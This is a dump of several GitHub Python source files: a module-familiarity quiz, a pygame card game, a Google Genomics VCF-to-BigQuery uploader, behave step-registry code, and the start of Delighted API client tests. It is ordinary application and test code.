metadata (dict) | text (string, lengths 60 to 3.49M)
---|---
{
"source": "Jessime/i_know_python",
"score": 4
}
|
#### File: i_know_python/i_know_python/main.py
```python
import pkg_resources
def run():
libraries = pkg_resources.resource_filename(__name__, 'data/library37.txt')
used = []
unused = []
welcome = "Welcome to 'I know Python'!\nAnswer these questions to the best of your ability.\n"
print(welcome)
with open(libraries, encoding='utf-8') as file:
for line in file:
line = line.strip()
if '—' in line:
while True:
result = input(f"Have you used:\n\t {line}\n[y/n]? ").lower()
if result == 'y':
used.append(line)
break
elif result == 'n':
unused.append(line)
break
else:
print("Please respond with 'y' or 'n'.")
print('='*12 + '\nUsed modules\n' + '='*12)
for module in used:
print(module)
print('\n' + '='*14 + '\nUnused modules\n' + '='*14)
for module in unused:
print(module)
print(f'\n# of used modules: {len(used)}\n# of unused modules: {len(unused)}')
if __name__ == '__main__':
run()
```
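The script above resolves its bundled question list with `pkg_resources.resource_filename`, which comes from setuptools and is deprecated on current Python. A minimal sketch of the same lookup using the standard-library `importlib.resources`, assuming Python 3.9+ and the same `i_know_python/data/library37.txt` package layout (the helper name is hypothetical):
```python
from importlib import resources

def load_library_lines():
    # Read data/library37.txt bundled inside the i_know_python package,
    # the modern equivalent of pkg_resources.resource_filename + open().
    resource = resources.files("i_know_python") / "data" / "library37.txt"
    return resource.read_text(encoding="utf-8").splitlines()
```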
|
{
"source": "Jessime/revenge_of_arius",
"score": 3
}
|
#### File: Jessime/revenge_of_arius/audio.py
```python
import pygame #, winsound
def skip():
while pygame.mixer.music.get_busy():
for event in pygame.event.get():
if event.type == pygame.MOUSEBUTTONUP:
pygame.mixer.music.stop()
else:
pass
def tutorial():
#pygame.event.pump
tut_pics = []
for i in range(19):
tut_pics.append(pygame.image.load("tut"+str(i+1)+".png"))
    for i in range(2, 6):
pygame.mixer.music.load("audio"+str(i)+".wav")
pygame.mixer.music.play(0, 0)
skip()
screen = pygame.display.set_mode([1300, 675])
for i in range(19):
screen.blit(tut_pics[i], [0,0])
pygame.display.flip()
pygame.mixer.music.load("audio"+str(i+6)+".wav")
pygame.mixer.music.play(0, 0)
skip()
#winsound.PlaySound("audio"+str(i)+".wav", winsound.SND_FILENAME)
####
#### screen.blit(tut_pics[0], [0,0])
#### pygame.display.flip()
#### winsound.PlaySound("audio6.wav", winsound.SND_FILENAME)
#### screen.blit(tut_pics[1], [0,0])
#### pygame.display.flip()
#### winsound.PlaySound("audio7.wav", winsound.SND_FILENAME)
#### screen.blit(tut_pics[2], [0,0])
#### pygame.display.flip()
#### winsound.PlaySound("audio8.wav", winsound.SND_FILENAME)
#### screen.blit(tut_pics[3], [0,0])
#### pygame.display.flip()
#### winsound.PlaySound("audio9.wav", winsound.SND_FILENAME)
#### screen.blit(tut_pics[4], [0,0])
#### pygame.display.flip()
#### winsound.PlaySound("audio10.wav", winsound.SND_FILENAME)
#### screen.blit(tut_pics[5], [0,0])
#### pygame.display.flip()
#### winsound.PlaySound("audio11.wav", winsound.SND_FILENAME)
# screen.blit(tut_pics[6], [0,0])
# pygame.display.flip()
## pygame.event.pump
## winsound.PlaySound("audio12.wav", winsound.SND_FILENAME)
## pygame.event.pump
## screen.blit(tut_pics[7], [0,0])
## pygame.display.flip()
## winsound.PlaySound("audio13.wav", winsound.SND_FILENAME)
## pygame.event.pump
## screen.blit(tut_pics[8], [0,0])
## pygame.display.flip()
## winsound.PlaySound("audio14.wav", winsound.SND_FILENAME)
## pygame.event.pump
## screen.blit(tut_pics[9], [0,0])
## pygame.display.flip()
## winsound.PlaySound("audio15.wav", winsound.SND_FILENAME)
## pygame.event.pump
# pygame.mixer.music.load("audio12.wav")
# pygame.mixer.music.play(0, 0)
# while pygame.mixer.music.get_busy():
# for event in pygame.event.get():
# pass
screen = pygame.display.set_mode([540, 720])
#pygame.quit()
```
#### File: Jessime/revenge_of_arius/cards.py
```python
import pygame
class Unit(pygame.sprite.Sprite):
    def __init__(self, option_number, image, card_info_list):
        pygame.sprite.Sprite.__init__(self)  # initialise the Sprite base class
        self.health = card_info_list[option_number][0]
self.damage = card_info_list[option_number][1]
self.speed = card_info_list[option_number][2]
self.ice_resistance = card_info_list[option_number][3]
self.fire_resistance = card_info_list[option_number][4]
self.lightning_resistance = card_info_list[option_number][5]
self.cost = card_info_list[option_number][6]
self.x = card_info_list[option_number][7]
self.y = card_info_list[option_number][8]
self.pix_x = (card_info_list[option_number][9])
self.pix_y = card_info_list[option_number][10]
self.p_designation = card_info_list[option_number][11]
self.image = image
self.name = card_info_list[option_number][12]
self.spell_list = []
self.c_i_l = card_info_list
self.casting = False
def move_card1(self, card_list, grid):
for i in range(self.speed):
blocking = 0
for card in card_list:
                if ((card.x == self.x + 1 and
                     card.y == self.y and
                     not isinstance(card, Spell) and
                     self.p_designation != card.p_designation) or
                        self.x == 14):
blocking += 1
if blocking == 0:
self.pix_x += 62
self.x += 1
self.x, self.y = grid[self.y][self.x].add_card(self)
grid[self.y][self.x-1].remove_card(self)
def move_card2(self, card_list, grid):
for i in range(self.speed):
blocking = 0
for card in card_list:
                if ((card.x == self.x - 1 and
                     card.y == self.y and
                     not isinstance(card, Spell) and
                     self.p_designation != card.p_designation) or
                        self.x == 1):
blocking += 1
if blocking == 0:
self.pix_x -= 62
self.x -= 1
self.x, self.y = grid[self.y][self.x].add_card(self)
grid[self.y][self.x+1].remove_card(self)
def draw_card(self):
self.pix_x += (self.x * 62)
self.pix_y += (self.y * 54)
def draw_popup_card(self, screen, corner, card_width):
self.pix_x = corner[0]+card_width
self.pix_y = corner[1]
screen.blit(self.image, [self.pix_x, self.pix_y])
def pop_spells(self, card_pics):
height = 0
counter = 0
self.spell_list.append(Spell(3, card_pics[3], self.c_i_l))
self.spell_list.append(Spell(4, card_pics[4], self.c_i_l))
self.spell_list.append(Spell(5, card_pics[5], self.c_i_l))
for card in self.spell_list:
if self.y <= 3:
height += 54
elif self.y > 3:
height -= 54
card.pix_x = self.pix_x
card.pix_y = self.pix_y + height
card.p_designation = self.p_designation
if card.p_designation == 1:
card.image = card_pics[counter + 3]
if card.p_designation == 2:
card.image = card_pics[counter + 15]
counter += 1
#Displays the red cards for placing spells in the proper location
def add_spell(self, grid, screen):
info_card5 = pygame.image.load("info_card5.png")
for i in range(8):
for j in range(16):
if self.p_designation == 1 and self.name == "santa":
if ((grid[i][j].x-1 <= self.x <= grid[i][j].x+1 and grid[i][j].y-1 == self.y) or
(grid[i][j].x-1 <= self.x <= grid[i][j].x+1 and grid[i][j].y+1 == self.y) or
(grid[i][j].x-1 == self.x and grid[i][j].y == self.y)):
screen.blit(info_card5, [grid[i][j].pix_x, grid[i][j].pix_y])
elif self.p_designation == 2 and self.name == "santa":
if ((grid[i][j].x-1 <= self.x <= grid[i][j].x+1 and grid[i][j].y-1 == self.y) or
(grid[i][j].x-1 <= self.x <= grid[i][j].x+1 and grid[i][j].y+1 == self.y) or
(grid[i][j].x+1 == self.x and grid[i][j].y == self.y)):
screen.blit(info_card5, [grid[i][j].pix_x, grid[i][j].pix_y])
elif self.p_designation == 1 and self.name == "reindeer":
if ((grid[i][j].x-2 == self.x and grid[i][j].y-2 == self.y) or
(grid[i][j].x-2 == self.x and grid[i][j].y+2 == self.y) or
(grid[i][j].x-1 == self.x and grid[i][j].y == self.y)):
screen.blit(info_card5, [grid[i][j].pix_x, grid[i][j].pix_y])
elif self.p_designation == 2 and self.name == "reindeer":
if ((grid[i][j].x+2 == self.x and grid[i][j].y-2 == self.y) or
(grid[i][j].x+2 == self.x and grid[i][j].y+2 == self.y) or
(grid[i][j].x+1 == self.x and grid[i][j].y == self.y)):
screen.blit(info_card5, [grid[i][j].pix_x, grid[i][j].pix_y])
elif self.p_designation == 1 and self.name == "elf":
if ((grid[i][j].x == self.x and grid[i][j].y-1 >= self.y >= grid[i][j].y-2) or
(grid[i][j].x == self.x and grid[i][j].y+1 <= self.y <= grid[i][j].y+2) or
(grid[i][j].x-1 == self.x and grid[i][j].y == self.y)):
screen.blit(info_card5, [grid[i][j].pix_x, grid[i][j].pix_y])
elif self.p_designation == 2 and self.name == "elf":
if ((grid[i][j].x == self.x and grid[i][j].y-1 >= self.y >= grid[i][j].y-2) or
(grid[i][j].x == self.x and grid[i][j].y+1 <= self.y <= grid[i][j].y+2) or
(grid[i][j].x+1 == self.x and grid[i][j].y == self.y)):
screen.blit(info_card5, [grid[i][j].pix_x, grid[i][j].pix_y])
class Spell(pygame.sprite.Sprite):
    def __init__(self, option_number, image, card_info_list):
        pygame.sprite.Sprite.__init__(self)  # initialise the Sprite base class
        self.elf_caster = card_info_list[option_number][0]
self.santa_caster = card_info_list[option_number][1]
self.reindeer_caster = card_info_list[option_number][2]
self.duration = card_info_list[option_number][3]
self.cost = card_info_list[option_number][4]
self.x = card_info_list[option_number][5]
self.y = card_info_list[option_number][6]
self.pix_x = card_info_list[option_number][7]
self.pix_y = card_info_list[option_number][8]
self.p_designation = card_info_list[option_number][9]
self.image = image
self.name = card_info_list[option_number][10]
        self.damage = int  # placeholder; replaced with a caster's damage value in casting_damage()
def draw_card(self):
self.pix_x += (self.x * 62)
self.pix_y += (self.y * 54)
def check_duration(self):
if self.duration >= 1:
self.duration -= 1
def casting_damage(self, action):
if action == 2.1 or action == 6.1:
self.damage = self.santa_caster
if action == 2.2 or action == 6.2:
self.damage = self.reindeer_caster
if action == 2.3 or action == 6.3:
self.damage = self.elf_caster
class Defense(pygame.sprite.Sprite):
    def __init__(self, option_number, image, card_info_list):
        pygame.sprite.Sprite.__init__(self)  # initialise the Sprite base class
        self.health = card_info_list[option_number][0]
self.damage = card_info_list[option_number][1]
self.cost = card_info_list[option_number][2]
self.x = card_info_list[option_number][3]
self.y = card_info_list[option_number][4]
self.pix_x = card_info_list[option_number][5]
self.pix_y = card_info_list[option_number][6]
self.p_designation = card_info_list[option_number][7]
self.image = image
self.name = card_info_list[option_number][8]
def draw_card(self):
self.pix_x += (self.x * 62)
self.pix_y += (self.y * 54)
class Production(pygame.sprite.Sprite):
    def __init__(self, option_number, image, card_info_list):
        pygame.sprite.Sprite.__init__(self)  # initialise the Sprite base class
        self.production_type = card_info_list[option_number][0]
self.health = card_info_list[option_number][1]
self.pro_rate = card_info_list[option_number][2]
self.cost = card_info_list[option_number][3]
self.x = card_info_list[option_number][4]
self.y = card_info_list[option_number][5]
self.pix_x = card_info_list[option_number][6]
self.pix_y = card_info_list[option_number][7]
self.p_designation = card_info_list[option_number][8]
self.image = image
self.name = card_info_list[option_number][9]
self.damage = 0
def draw_card(self):
self.pix_x += (self.x * 62)
self.pix_y += (self.y * 54)
```
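Every card class above unpacks a positional record from `card_info_list[option_number]`; for `Unit` the layout is health, damage, speed, the three resistances, cost, grid x/y, pixel x/y, player designation, and name. A minimal sketch of constructing a `Unit` from such a record, where the example values and the placeholder surface are invented for illustration:
```python
import pygame

# Hypothetical record following Unit's positional layout:
# [health, damage, speed, ice_res, fire_res, lightning_res, cost,
#  x, y, pix_x, pix_y, p_designation, name]
example_card_info = [
    [10, 3, 2, 1, 0, 0, 4, 1, 2, 153, 120, 1, "elf"],
]

pygame.init()
placeholder_image = pygame.Surface((60, 52))  # stand-in for a loaded card image
elf = Unit(0, placeholder_image, example_card_info)
print(elf.name, elf.health, (elf.x, elf.y))
```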
#### File: Jessime/revenge_of_arius/events.py
```python
import pygame, textbox, play_cards, cards, gather, buttons
def downclick(pick_card, player_turn, card_num, card_list,
p1, p2, card_pics, grid, screen, rand_x, rand_y,
bag_visible, gather_mana, popup):
# Set the width, height, margin of each grid location
width = 60
height = 52
margin = 2
spell_visible = False
# Initialize grid coordinates
x = int
y = int
# User clicks the mouse. Get the position
pos = pygame.mouse.get_pos()
if (153 < pos[0] < 1145) and (120 < pos[1] < 552):
# Change the x/y screen coordinates to grid coordinates if popup window isn't open
if popup == []:
x = (pos[0]-153) // (width + margin)
y = (pos[1]-120) // (height + margin)
# Check if mana bag has been clicked
if bag_visible == True and rand_x == x and rand_y == y:
bag_visible = False
gather_mana = True
buttons.btn_dic["gather_btn"] = buttons.gather_btn
# Check if card has been selected
elif pick_card == True:
pick_card = False
action = play_cards.placement_check(player_turn, card_num, p1, p2, x, y, popup, card_list)
play_cards.place_card(action, card_num, card_pics, card_list, grid, x, y, p1, p2, player_turn)
# Check if pop_up window should be created or closed
elif (len(grid[y][x].occupants_list) != 0 and
grid[y][x].fogged == False):
popup = [x, y]
elif popup != []: #If popup is open
# Check if spells should be displayed for casting in pop_up window
for pop_card in grid[popup[1]][popup[0]].occupants_list:
if (pop_card.pix_x <= pos[0] <= pop_card.pix_x + 60 and
pop_card.pix_y <= pos[1] <= pop_card.pix_y + 52 and
pop_card.p_designation == player_turn and
isinstance(pop_card, cards.Unit)): #If unit is clicked
if pop_card.spell_list == []: #If spells aren't showing
pop_card.pop_spells(card_pics) #Show spells
spell_visible = True
elif isinstance(pop_card, cards.Unit):
for spell_card in pop_card.spell_list:
if spell_card.pix_x <= pos[0] <= spell_card.pix_x + 60 and spell_card.pix_y <= pos[1] <= spell_card.pix_y + 52:
                            pop_card.casting = True #Signals a Unit attempting to cast a spell
pick_card = True
if popup[1] <= 3: # For the top half
card_num = ((pos[1]-(pop_card.pix_y + 52))// (height+margin))+ 3 # Weird math to find card number based on pixel location
else: # For the bottom half
card_num = ((pop_card.pix_y - (pos[1]-2))// (height+margin))+ 3
# Close the pop up window
if spell_visible == False:
grid[popup[1]][popup[0]].close_pop()
popup = []
# Check if card is clicked
elif (312 <= pos[0] < 498) and (33 < pos[1] < 85):
card_num = (pos[0]-312)// (width+margin)
pick_card = True
elif (498 <= pos[0] < 868) and (33 < pos[1] < 85):
card_num = (186+(pos[0]-312))// (width+margin)
pick_card = True
# Check if end turn is clicked
else:
for btn in buttons.btn_dic.values():
btn.check_dclick(pos)
return pick_card, card_num, x, y, bag_visible, gather_mana, popup
def upclick(countdown, text_btn, display_timer, gather_mana, mana_increase, correct):
pos = pygame.mouse.get_pos()
"""get_mana(button, textbox)"""
# Check if button is released
for btn in buttons.btn_dic.values():
btn.check_uclick(pos)
# Process actions for button clicks
if buttons.btn_dic["end_turn"].clicked == True:
buttons.btn_dic["end_turn"].clicked = False
countdown, display_timer = 0,0
elif buttons.btn_dic.get("gather_btn") != None:
if buttons.btn_dic["gather_btn"].clicked == True:
buttons.btn_dic["gather_btn"].clicked = False
if text_btn.string == str(mana_increase) and gather_mana == True:
correct = True
else:
text_btn.str_list = [""]
text_btn.selected = False
# Check if textbox button has been clicked
if gather_mana == True and text_btn.rect.collidepoint(pos):
if text_btn.selected == False:
text_btn.selected = True
else:
text_btn.selected = False
return countdown, display_timer, correct
```
#### File: Jessime/revenge_of_arius/gather.py
```python
import pygame, random, textbox, buttons
def get_random():
rand_column = random.randint(1, 14)
rand_row = random.randint(0, 7)
return rand_column, rand_row
# Draw the mana bag during allowed time as long as the bag hasn't been clicked
def gather_mana(rand_x, rand_y, bag_visible, grid, screen):
if bag_visible == True:
bag = pygame.image.load("present_bag.png")
screen.blit(bag, [grid[rand_y][rand_x].pix_x, grid[rand_y][rand_x].pix_y])
# Draw textbox and mana button during allowed time if the mana bag has been clicked
def gathering(gather_mana, correct, mana_increase, screen, player_turn, text_btn):
font = pygame.font.Font(None, 30)
info_card7 = pygame.image.load("info_card7.png")
info_card8 = pygame.image.load("info_card8.png")
if gather_mana == True and correct == False:
num_text1 = font.render("Mana ",True,[0,0,0])
num_text2 = font.render(str(mana_increase),True,[0,0,0])
if player_turn == 1:
screen.blit(info_card7, [906, 0])
else:
screen.blit(info_card8, [906, 0])
screen.blit(num_text1, [940, 72])
screen.blit(num_text2, [945, 92])
text_btn.update(screen)
# Called if mana has been correctly entered. Gives player mana.
def gathered(correct, gather_mana, text_btn, p1, p2, player_turn, mana_increase):
if correct == True:
correct = False
gather_mana = False
text_btn.selected = False
text_btn.str_list = [""]
text_btn.string= ''.join(text_btn.str_list)
del buttons.btn_dic["gather_btn"]
# If player1 gained mana
if player_turn == 1:
p1.mana += mana_increase
# If player2 gained mana
elif player_turn == 2:
p2.mana += mana_increase
return correct, gather_mana
def reset_gather(text_btn):
bag_visible = False
gather_mana = False
text_btn.selected = False
text_btn.str_list = [""]
text_btn.string = ''.join(text_btn.str_list)
# Delete the gather button from list if it hasn't been already
if buttons.btn_dic.get("gather_btn") != None:
del buttons.btn_dic["gather_btn"]
return bag_visible, gather_mana
```
|
{
"source": "Jessime/variant-annotation",
"score": 2
}
|
#### File: curation/tables/vcf_to_bigquery_utils.py
```python
import logging
import time
from apiclient import discovery
from oauth2client.client import GoogleCredentials
from retrying import retry
# Use tensorflow.gfile library, if available, to expand wildcards (optional).
try:
from tensorflow import gfile
except ImportError:
gfile = None
import schema_update_utils
class VcfUploader(object):
"""Class for managing a Google Genomics API connection and data transfers.
Handles finding and creating variant sets and datasets and uploading and
exporting variants stored in VCF. The main entry point is
upload_variants(...), but other intermediate pipeline steps may also be used.
"""
def __init__(self, project, credentials=None):
"""Create VcfUploader class.
Args:
project: Cloud project to use for Genomics objects.
credentials: Credentials object to use, get_application_default() if None.
"""
if credentials is None:
credentials = GoogleCredentials.get_application_default()
self.project = project
self.service = discovery.build("genomics", "v1", credentials=credentials)
@staticmethod
def find_id_or_name(name, candidates):
"""Find a value linked as "id" or "name" in a collection of dicts.
Args:
name: string to search for in "id" and "name" fields.
candidates: collection of dicts that should have "id" and "name" keys.
Returns:
choice["id"] for the unique matching choice (matched by "name" or "id").
Returns None if no matching choice is found.
Raises:
LookupError: If multiple items match the targeted name.
"""
target_id = None
for choice in candidates:
if choice.get("id") == name or choice.get("name") == name:
if target_id is not None:
raise LookupError("Found multiple hits for requested name")
target_id = choice["id"]
return target_id
def find_or_create_dataset(self,
dataset_name,
always_create=False):
"""Finds or creates a Google Genomics dataset by name or id.
If an existing dataset in the project has a name or ID of dataset_name, it
will be reused and its id will be returned, unless always_create is True.
A new dataset will be created if an existing one is not found.
Args:
dataset_name: Name or id of existing dataset, or name for a new dataset.
always_create: Always create a new dataset with the requested name.
Returns:
The id of the existing or newly-created Genomics dataset.
"""
request = self.service.datasets().list(projectId=self.project)
response = request.execute()
dataset_id = self.find_id_or_name(dataset_name,
response["datasets"])
if dataset_id is None or always_create:
request = self.service.datasets().create(
body={"name": dataset_name,
"projectId": self.project})
response = request.execute()
dataset_id = response["id"]
return dataset_id
def find_or_create_variantset(self,
variantset_name,
dataset_id,
description="",
always_create=False):
"""Finds or creates a Google Genomics variant set by name or id.
If an existing variant set in the project has a name or ID of
variantset_name, it will be reused and its id will be returned, unless
always_create is True. A new variant set will be created if an existing
one is not found.
Args:
variantset_name: Name or id of existing variant set, or name for a new
variant set.
dataset_id: Id of the dataset to find or create the variant set.
description: The description for the variant set.
always_create: Always create a new variant set with the requested name.
Returns:
The id of the existing or newly-created Genomics variant set.
"""
request = self.service.variantsets().search(
body={"datasetIds": dataset_id})
response = request.execute()
variantset_id = self.find_id_or_name(variantset_name,
response["variantSets"])
if variantset_id is None or always_create:
request = self.service.variantsets().create(
body={"name": variantset_name,
"datasetId": dataset_id,
"description": description,
})
response = request.execute()
variantset_id = response["id"]
return variantset_id
def import_variants(self, source_uris, variantset_id):
"""Imports variants stored in a VCF file on Cloud Storage to a variant set.
Args:
source_uris: List of paths to VCF file[s] in Cloud Storage, wildcards
accepted (*, not **).
variantset_id: Id of the variant set to load the variants.
Returns:
The name of the loading operation.
"""
request = self.service.variants().import_(
body={"variantSetId": variantset_id,
"sourceUris": source_uris})
response = request.execute()
return response["name"]
# Handle transient HTTP errors by retrying several times before giving up.
# Works around race conditions that arise when the operation ID is not
# found, which yields a 404 error.
@retry(stop_max_attempt_number=10, wait_exponential_multiplier=2000)
def wait_for_operation(self, operation_id, wait_seconds=30):
"""Blocks until the Genomics operation completes.
Args:
operation_id: The name (id string) of the loading operation.
wait_seconds: Number of seconds to wait between polling attempts.
Returns:
True if the operation succeeded, False otherwise.
"""
request = self.service.operations().get(name=operation_id)
while not request.execute()["done"]:
time.sleep(wait_seconds)
# If the operation succeeded, there will be a "response" field and not an
# "error" field, see:
# https://cloud.google.com/genomics/reference/rest/Shared.Types/ListOperationsResponse#Operation
response = request.execute()
return "response" in response and "error" not in response
def export_variants(self, variantset_id, destination_table):
"""Exports variants from Google Genomics to BigQuery.
Per the Genomics API, this will overwrite any existing BigQuery table with
this name.
Args:
variantset_id: Id of the variant set to export.
destination_table: BigQuery output, as PROJECT_ID.DATASET_NAME.TABLE_NAME.
Returns:
The name of the export operation.
"""
tokenized_table = schema_update_utils.tokenize_table_name(destination_table)
bigquery_project_id, dataset_name, table_name = tokenized_table
request = self.service.variantsets().export(
variantSetId=variantset_id,
body={"projectId": bigquery_project_id,
"bigqueryDataset": dataset_name,
"bigqueryTable": table_name})
response = request.execute()
return response["name"]
def upload_variants(self,
dataset,
variantset,
source_vcfs,
destination_table,
expand_wildcards=False,
new_dataset=False,
new_variantset=False,
description=None):
"""Imports variants stored in a VCF in Cloud Storage to BigQuery.
Handle all intermediate steps, including finding dataset and variant sets.
Args:
dataset: Name or id of existing dataset, or name for a new dataset.
variantset: Name or id of existing variant set, or name for a new one.
source_vcfs: List of VCF file[s] in Cloud Storage, wildcards accepted
(*, not **).
destination_table: BigQuery output, as PROJECT_ID.DATASET_NAME.TABLE_NAME.
expand_wildcards: Expand wildcards in VCF paths and use parallel imports.
new_dataset: Always create a new dataset with the requested name.
new_variantset: Always create a new variant set with the requested name.
description: Optional description for the BigQuery table.
Raises:
RuntimeError: If an upload or export request does not succeed.
"""
dataset_id = self.find_or_create_dataset(dataset,
always_create=new_dataset)
variantset_id = self.find_or_create_variantset(
variantset,
dataset_id,
description="\t".join(source_vcfs),
always_create=new_variantset)
# Spawn off parallel imports for each VCF.
if expand_wildcards and gfile is not None:
# Expand any wildcarded paths and concatenate all files together.
source_vcfs = sum([gfile.Glob(source_vcf) for source_vcf in source_vcfs],
[])
operation_ids = []
for source_vcf in source_vcfs:
operation_ids.append(self.import_variants(source_vcf, variantset_id))
logging.info("Importing %s (%s)", source_vcf, operation_ids[-1])
# Wait for all imports to complete successfully before exporting variantset.
for operation_id in operation_ids:
if not self.wait_for_operation(operation_id):
raise RuntimeError("Failed to import variants to Genomics (%s)"
% operation_id)
operation_id = self.export_variants(variantset_id, destination_table)
logging.info("Exporting %s (%s)", variantset, operation_id)
if not self.wait_for_operation(operation_id):
raise RuntimeError("Failed to export variants to BigQuery (%s)"
% operation_id)
# Assume the VCF header is the same for all files and so just use the first.
logging.info("Updating schema for %s", variantset)
schema_update_utils.update_table_schema(destination_table,
source_vcfs[0],
description=description)
```
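The docstrings describe `upload_variants` as the end-to-end entry point: find or create the dataset and variant set, import each VCF, wait for the operations, export to BigQuery, then patch the table schema. A sketch of how it might be invoked, using made-up project, bucket, and table names and assuming application-default credentials and access to the Genomics v1 API:
```python
from oauth2client.client import GoogleCredentials

uploader = VcfUploader("my-gcp-project",
                       credentials=GoogleCredentials.get_application_default())
uploader.upload_variants(
    dataset="my_genomics_dataset",          # hypothetical names throughout
    variantset="cohort_vcfs",
    source_vcfs=["gs://my-bucket/vcfs/*.vcf"],
    destination_table="my-gcp-project.variant_annotation.cohort_variants",
    expand_wildcards=True,
    description="Imported from gs://my-bucket/vcfs")
```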
|
{
"source": "jessingrass/behave",
"score": 2
}
|
#### File: behave/behave4cmd0/note_steps.py
```python
from behave import step
# -----------------------------------------------------------------------------
# STEPS FOR: remarks/comments
# -----------------------------------------------------------------------------
@step(u'note that "{remark}"')
def step_note_that(context, remark):
"""
Used as generic step that provides an additional remark/hint
    and enhances the readability/understanding without performing any check.
.. code-block:: gherkin
Given that today is "April 1st"
But note that "April 1st is Fools day (and beware)"
"""
log = getattr(context, "log", None)
if log:
log.info(u"NOTE: %s;" % remark)
```
#### File: behave/behave/step_registry.py
```python
class AmbiguousStep(ValueError):
pass
class StepRegistry(object):
def __init__(self):
self.steps = {
'given': [],
'when': [],
'then': [],
'step': [],
}
@staticmethod
def same_step_definition(step, other_string, other_location):
return (step.string == other_string and
step.location == other_location and
other_location.filename != "<string>")
def add_step_definition(self, keyword, string, func):
# TODO try to fix module dependencies to avoid this
from behave import matchers, model
step_location = model.Match.make_location(func)
step_type = keyword.lower()
step_definitions = self.steps[step_type]
for existing in step_definitions:
if self.same_step_definition(existing, string, step_location):
# -- EXACT-STEP: Same step function is already registered.
# This may occur when a step module imports another one.
return
elif existing.match(string):
message = '%s has already been defined in\n existing step %s'
new_step = u"@%s('%s')" % (step_type, string)
existing.step_type = step_type
existing_step = existing.describe()
existing_step += " at %s" % existing.location
raise AmbiguousStep(message % (new_step, existing_step))
step_definitions.append(matchers.get_matcher(func, string))
def find_step_definition(self, step):
candidates = self.steps[step.step_type]
more_steps = self.steps['step']
if step.step_type != 'step' and more_steps:
# -- ENSURE: self.step_type lists are not modified/extended.
candidates = list(candidates)
candidates += more_steps
for step_definition in candidates:
if step_definition.match(step.name):
return step_definition
return None
def find_match(self, step):
candidates = self.steps[step.step_type]
more_steps = self.steps['step']
if step.step_type != 'step' and more_steps:
# -- ENSURE: self.step_type lists are not modified/extended.
candidates = list(candidates)
candidates += more_steps
for step_definition in candidates:
result = step_definition.match(step.name)
if result:
return result
return None
def make_decorator(self, step_type):
# pylint: disable=W0621
# W0621: 44,29:StepRegistry.make_decorator: Redefining 'step_type' ..
def decorator(string):
def wrapper(func):
self.add_step_definition(step_type, string, func)
return func
return wrapper
return decorator
registry = StepRegistry()
# -- Create the decorators
def setup_step_decorators(context=None, registry=registry):
if context is None:
context = globals()
for step_type in ('given', 'when', 'then', 'step'):
step_decorator = registry.make_decorator(step_type)
context[step_type.title()] = context[step_type] = step_decorator
# -----------------------------------------------------------------------------
# MODULE INIT:
# -----------------------------------------------------------------------------
# limit import * to just the decorators
names = 'given when then step'
names = names + ' ' + names.title()
__all__ = names.split()
setup_step_decorators()
```
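`setup_step_decorators` injects `given`, `when`, `then`, and `step` (plus their title-case aliases) into the module globals, and those decorators simply forward to `registry.add_step_definition`. A small sketch of a step module built on them; the step texts are hypothetical:
```python
from behave import given, then

@given(u'a user named "{name}"')
def step_given_a_user(context, name):
    # Registered via StepRegistry.add_step_definition under the 'given' keyword.
    context.user = name

@then(u'the user name is "{name}"')
def step_then_user_name(context, name):
    assert context.user == name
```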
|
{
"source": "jessjass/cs3240-labdemo",
"score": 2
}
|
#### File: jessjass/cs3240-labdemo/helper.py
```python
__author__ = "<NAME> (jj5dp)"
def greeting(msg):
print(msg)
```
|
{
"source": "jesska-f/delighted-python",
"score": 2
}
|
#### File: delighted-python/test/test_resource.py
```python
import delighted
from delighted.util import aware_datetime_to_epoch_seconds, \
naive_date_to_datetime
from . import get_headers, post_headers, DelightedTestCase
from delighted.errors import TooManyRequestsError
import datetime
import pytz
import tzlocal
from base64 import b64encode
from mock import patch
from six import b
import sys
class TestResource(DelightedTestCase):
def setUp(self):
super(TestResource, self).setUp()
def check_retrieving_metrics(self, client=None):
data = {'nps': 10}
url = 'https://api.delightedapp.com/v1/metrics'
self.mock_response(200, {}, data)
expected_headers = get_headers.copy()
retrieve_kwargs = {}
if client:
retrieve_kwargs['client'] = client
expected_headers['Authorization'] = 'Basic %s' % b64encode(b(client.api_key)).decode('ascii')
metrics = delighted.Metrics.retrieve(**retrieve_kwargs)
self.check_call('get', url, expected_headers, {}, None)
self.assertTrue(delighted.Metrics is type(metrics))
self.assertEqual(dict(metrics), data)
self.assertEqual(metrics.nps, 10)
self.assertRaises(AttributeError, lambda: metrics.id)
def test_retrieving_metrics(self):
self.check_retrieving_metrics()
def test_retrieving_metrics_other_client(self):
client = delighted.Client(api_key='example')
self.check_retrieving_metrics(client=client)
def test_retrieving_metrics_range_unixtimestamp(self):
data = {'nps': 10}
self.mock_response(200, {}, data)
since = 1425168000
until = 1430348400
url = 'https://api.delightedapp.com/v1/metrics'
metrics = delighted.Metrics.retrieve(since=since, until=until)
self.check_call('get', url, get_headers, None,
{'since': 1425168000, 'until': 1430348400})
self.assertTrue(delighted.Metrics is type(metrics))
self.assertEqual(dict(metrics), data)
self.assertEqual(metrics.nps, 10)
self.assertRaises(AttributeError, lambda: metrics.id)
def test_retrieving_metrics_range_date_object(self):
data = {'nps': 10}
self.mock_response(200, {}, data)
since = datetime.date(2013, 10, 1)
until = datetime.date(2013, 11, 1)
timezone = tzlocal.get_localzone()
since_seconds = self._naive_date_to_epoch_seconds(since, timezone)
until_seconds = self._naive_date_to_epoch_seconds(until, timezone)
url = 'https://api.delightedapp.com/v1/metrics'
metrics = delighted.Metrics.retrieve(since=since, until=until)
self.check_call('get', url, get_headers, None,
{'since': since_seconds, 'until': until_seconds})
self.assertTrue(delighted.Metrics is type(metrics))
self.assertEqual(dict(metrics), data)
self.assertEqual(metrics.nps, 10)
self.assertRaises(AttributeError, lambda: metrics.id)
def test_retrieving_metrics_range_datetime_object(self):
data = {'nps': 10}
self.mock_response(200, {}, data)
timezone = pytz.timezone('America/Chicago')
since = timezone.localize(datetime.datetime(2013, 10, 1))
until = timezone.localize(datetime.datetime(2013, 11, 1))
url = 'https://api.delightedapp.com/v1/metrics'
metrics = delighted.Metrics.retrieve(since=since, until=until)
self.check_call('get', url, get_headers, None,
{'since': 1380603600, 'until': 1383282000})
self.assertTrue(delighted.Metrics is type(metrics))
self.assertEqual(dict(metrics), data)
self.assertEqual(metrics.nps, 10)
self.assertRaises(AttributeError, lambda: metrics.id)
def check_creating_or_updating_a_person(self, client=None):
email = '<EMAIL>'
data = {'id': '123', 'email': email}
url = 'https://api.delightedapp.com/v1/people'
self.mock_response(200, {}, data)
expected_headers = post_headers.copy()
create_kwargs = {'email': email}
if client:
create_kwargs['client'] = client
